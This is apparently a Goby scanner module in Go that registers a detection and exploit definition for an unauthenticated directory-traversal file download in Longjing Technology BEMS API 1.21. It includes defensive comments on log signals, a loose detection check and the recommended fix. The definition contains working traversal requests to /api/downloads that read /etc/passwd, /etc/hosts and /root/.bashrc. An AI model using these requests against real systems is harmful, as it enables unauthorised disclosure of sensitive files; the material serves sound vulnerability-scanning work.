Longjing_Technology_BEMS_API_1.21_Remote_Arbitrary_File_Download.go
package exploits
import (
"git.gobies.org/goby/goscanner/goutils"
)
// init registers this Goby exploit definition with ExpManager when the
// package is loaded. The definition is a JSON document describing the
// Longjing Technology BEMS API 1.21 arbitrary file download issue
// (exploit-db 50163, per the References field): a fingerprint query
// (GobyQuery), two detection requests (ScanSteps) and one exploit
// request template (ExploitSteps) whose {{{path}}} placeholder is
// filled from the "path" entry of ExpParams. The engine stores the
// last response body as "output" (SetVariable: "output|lastbody").
//
// Notes for defenders and maintainers, all taken from the definition:
//   - The traversal is in the fileName query parameter of
//     GET /api/downloads; the detection steps send ../-prefixed paths
//     and look for a 200 response. Requests of that shape in the web
//     server access log are the detection signal on the target side.
//   - GobyQuery only matches the nginx Server header version, so hosts
//     selected by the query are not necessarily running this product.
//   - The second scan step joins the status-code check and the body
//     checks with OR, so any 200 reply satisfies it; a confident hit
//     therefore rests on the first step (200 and body contains "root").
//     Expect noise from hosts that answer 200 to arbitrary paths.
//   - The Recommandation field (key spelled as in the original) asks
//     for downloads to be resolved through a server-side mapping rather
//     than a caller-supplied path, which removes the traversal surface.
//   - CVEIDs is null and CVSSScore is "0.0": no CVE is recorded here.
func init() {
	// The manifest is consumed by the Goby engine as text, so it is kept
	// verbatim as an untyped string constant.
	const definition = `{
"Name": "Longjing Technology BEMS API 1.21 Remote Arbitrary File Download",
"Description": "The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks.",
"Product": "Battery Energy Management System",
"Homepage": "http://www.ljkj2012.com",
"DisclosureDate": "2021-08-01",
"Author": "[email protected]",
"GobyQuery": "server=\"nginx/1.19.1\"",
"Level": "2",
"Impact": "<p><span style=\"font-size: 14px;\">The vulnerability of arbitrary file download or read is mainly caused by the fact that when the application system provides the function of file download or read, the application system directly specifies the file path in the file path parameter without verifying the validity of the file path. As a result, the attacker can jump through the directory (.. </span><span style=\"font-size: 14px;\"> \\ or.. </span><span style=\"font-size: 14px;\"> /) to download or read a file beyond the original specified path. </span><span style=\"font-size: 14px;\"> The attacker can finally download or read any files on the system through this vulnerability, such as database files, application system source code, password configuration information and other important sensitive information, resulting in sensitive information leakage of the system. </span><br></p>",
"Recommandation": "<p><span style=\"font-size: 14px;\">Limit ../ </span><span style=\"font-size: 14px;\">The best way is that the file should be in the database for one to one mapping, avoid entering the absolute path to obtain the file </span><br></p>",
"References": [
"https://www.exploit-db.com/exploits/50163"
],
"HasExp": true,
"ExpParams": [
{
"name": "path",
"type": "createSelect",
"value": "../../../etc/passwd,../../../../etc/hosts,../../../../root/.bashrc",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/api/downloads?fileName=../../../etc/passwd",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "root",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "GET",
"uri": "/api/downloads?fileName=../../../etc/hosts",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "OR",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "127.0.0.1",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "localhost",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/api/downloads?fileName={{{path}}}",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"SetVariable": [
"output|lastbody"
]
}
],
"Tags": [
"file download"
],
"CVEIDs": null,
"CVSSScore": "0.0",
"AttackSurfaces": {
"Application": ["Battery Energy Management System"],
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`

	// goutils.GetFileName() keys the registration to this source file's
	// name. The last two arguments are nil here; what NewExploit does
	// with them is defined outside this file — presumably optional
	// scan/exploit callbacks, confirm against its signature.
	ExpManager.AddExploit(NewExploit(goutils.GetFileName(), definition, nil, nil))
}